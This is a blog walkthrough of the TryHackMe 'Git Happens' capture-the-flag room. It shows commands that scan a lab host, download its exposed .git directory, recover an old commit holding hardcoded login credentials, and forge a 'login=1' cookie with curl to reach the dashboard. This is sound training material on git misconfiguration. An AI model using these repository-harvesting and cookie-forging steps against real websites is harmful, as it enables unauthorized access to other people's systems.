Tryhackme: Git Happens — WalkThrough - CyberSec Nerds

Tryhackme: Git Happens — WalkThrough

Today, we will be doing Git Happens from TryHackMe which is labeled as a beginner-level room that aims at teaching version control (git) misconfigurations and stupid mistakes that developers may make which ultimately lead to serious security issues. Without further ado, let’s connect to our THM OpenVPN network and start hacking!!!

Port Scanning

┌──(kiran㉿kali)-[~]
└─$ nmap -sC -sV 10.10.201.254 -oA nmap 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-19 18:17 +0545
Nmap scan report for 10.10.201.254
Host is up (0.20s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.14.0 (Ubuntu)
| http-git:  
|   10.10.201.254:80/.git/
|     Git repository found!
|_    Repository description: Unnamed repository; edit this file 'description' to name the...
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

A directory .git was discovered by nmap. After navigating to the URL, we got the following contents as listed.

.git Directory Listing

Looks like a git repository. Lets download all the files and investigate locally.

$ wget http://10.10.191.151/.git/ --recursive --no-parent        
--2021-05-20 17:47:05--  http://10.10.191.151/.git/ 
Connecting to 10.10.191.151:80... connected. 
HTTP request sent, awaiting response... 200 OK 
Length: unspecified [text/html] 
Saving to: ‘10.10.191.151/.git/index.html’ 
<SNIP>

Port 80

There is a login page in port 80.

Analyzing the repository

Apart from the git directory structure, I couldn’t find any interesting files. Now, let’s use the git commands to look at what exactly is this repository is about. Command git status shows the current state of the repo.

┌──(kiran㉿kali)-[~/…/boxes/thm/Git Happens/repository]
└─$ git status 
On branch master
Changes not staged for commit:
 (use "git add/rm <file>..." to update what will be committed)
 (use "git restore <file>..." to discard changes in working directory)
       deleted:    .gitlab-ci.yml
       deleted:    Dockerfile
       deleted:    README.md
       deleted:    css/style.css
       deleted:    dashboard.html
       deleted:    default.conf
       deleted:    index.html

no changes added to commit (use "git add" and/or "git commit -a")

We can see quite a few files have been recently deleted but the changes have not been committed. It’s possible to restore the files with git restore <file> command. I restored the files index.html and dashboard.html and analyzed the source code. The JavaScript code was heavily obfuscated. There must be another way.

Its time to analyze the logs. Lets harness the true power of version control system i.e, going back in time.

┌──(kiran㉿kali)-[~/…/boxes/thm/Git Happens/repository]                                                                                                                 
└─$ git log                                                                                                                                
commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0)                                                                                             
Author: Adam Bertrand <hydragyrum@gmail.com>
Date:   Thu Jul 23 22:22:16 2020 +0000

   Update .gitlab-ci.yml
<SNIP>
commit 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:17:43 2020 +0200

   Made the login page, boss!

commit 2f423697bf81fe5956684f66fb6fc6596a1903cc
Author: Adam Bertrand <hydragyrum@gmail.com>
Date:   Mon Jul 20 20:46:28 2020 +0000

   Initial commit

Back into the logs, there was a commit made in July 23 where the login page development was just finished and the code obfuscation has not been done yet. Lets checkout to that previous version of code i.e, 395e087334d613d5e423cdf8f7be27196a360459.

┌──(kiran㉿kali)-[~/…/boxes/thm/Git Happens/repository] 
└─$ git checkout 395e087334d613d5e423cdf8f7be27196a360459  
D       README.md
Note: switching to '395e087334d613d5e423cdf8f7be27196a360459'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:

 git switch -c <new-branch-name>

Or undo this operation with:

 git switch -

Turn off this advice by setting config variable advice.detachedHead to false

HEAD is now at 395e087 Made the login page, boss!

┌──(kiran㉿kali)-[~/…/boxes/thm/Git Happens/repository]
└─$ ls
css  dashboard.html  index.html

After analyzing the source code of index.html, credentials to sign into the website was left over in cleartext.

   <script>
     function login() {
       let form = document.getElementById("login-form");
       console.log(form.elements);
       let username = form.elements["username"].value;
       let password = form.elements["password"].value;
       if (
         username === "admin" &&
         password === "<REDACTED>"
       ) {
         document.cookie = "login=1";
         window.location.href = "/dashboard.html";
       } else {
         document.getElementById("error").innerHTML =
           "INVALID USERNAME OR PASSWORD!";
       }
     }
   </script>

After verifying the login, cookie login=1 is set by the JavaScript. Lets authenticate ourselves using this cookie to get access to the dashboard.html.

┌──(kiran㉿kali)-[~/…/boxes/thm/Git Happens/repository] 
└─$ curl http://10.10.123.54/dashboard.html -H 'Cookie: login=1' -L   
<!DOCTYPE html>
<html lang="en">
 <head>
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1.0" />
   <title>Awesome!</title>
   <link rel="stylesheet" href="/css/style.css" />
 </head>
 <body onload="checkCookie()">
   <p class="rainbow-text">Awesome! Use the password you input as the flag!</p>

As it says, we can use that password as the flag to be inputted for the challenge.

Happy Hacking!!

Kiran Dawadi

Founder of cybersecnerds.com. Electronics Engineer by profession, Security Engineer by passion. I am a Linux Enthusiast and highly interested in the offensive side of the CyberSec industry. You will find me reading InfoSec blogs most of the time.

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments